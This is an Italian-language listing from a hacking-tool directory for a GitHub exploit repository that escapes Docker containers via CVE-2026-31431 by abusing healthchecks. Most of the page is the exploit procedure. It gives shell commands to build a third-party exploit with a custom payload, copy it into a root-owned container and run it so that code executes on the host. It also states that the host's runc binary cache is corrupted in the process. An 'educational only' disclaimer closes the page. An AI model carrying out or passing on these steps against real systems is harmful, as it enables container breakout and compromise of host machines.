Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-31431-Copy-Fail-Container-Escape — # Evasione del container su qualsiasi container Docker con healthcheck abilitato tramite CVE-2026-31431 | Kitploit
Strumenti/GitHubGitHub/hans362/cve-2026-31431-copy-fail-container-escape
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSicurezza CloudApprendimento e FormazioneEscape dal Container
GitHubhans362/cve-2026-31431-copy-fail-container-escape

CVE-2026-31431-Copy-Fail-Container-Escape

# Evasione del container su qualsiasi container Docker con healthcheck abilitato tramite CVE-2026-31431

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
23 mesi faNon ancora revisionato

CVE-2026-31431-Copy-Fail-Container-Escape

Demo

https://github.com/user-attachments/assets/2cb0cb67-789a-4461-a0b8-1fe878d9426e

Prerequisiti

  • Container vulnerabile a CVE-2026-31431
  • Healthcheck del container configurato e CMD dell'healthcheck noto
  • Accesso root ottenuto all'interno del container (in caso contrario, puoi semplicemente usare Copy Fail per ottenerlo)

In questo repository, docker-compose.yml è fornito per configurare un container vulnerabile. Puoi anche usare qualsiasi altro container vulnerabile o configurarne uno tuo, ma ricorda di modificare il codice dell'exploit di conseguenza.

Passaggi per l'exploit

root@kitploit:~
# Sulla macchina host
rm -r copy-fail-c /tmp/pwned
docker-compose up -d
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
docker cp exp.sh copyfail:/tmp/
docker cp exploit copyfail:/tmp/
docker exec -it copyfail /bin/sh

# Dentro il container copyfail
cd /tmp
chmod +x exp.sh exploit
./exp.sh

# Attendi qualche minuto affinché l'healthcheck venga eseguito
# e verifica se /tmp/pwned viene creato sull'host

# Sulla macchina host
ls /tmp/pwned

Una volta che l'exploit ha successo, la pagecache del binario runc sulla macchina host viene corrotta. Puoi ripristinarla eseguendo echo 3 | sudo tee /proc/sys/vm/drop_caches sull'host.

Crediti

  • https://copy.fail/
  • https://github.com/tgies/copy-fail-c

Disclaimer

Questo repository è solo a scopo educativo. Non deve essere utilizzato per attività dannose. L'autore non è responsabile per eventuali danni causati dall'uso improprio di questo codice. Usalo sempre in un ambiente controllato e legale.

Scarica lo strumento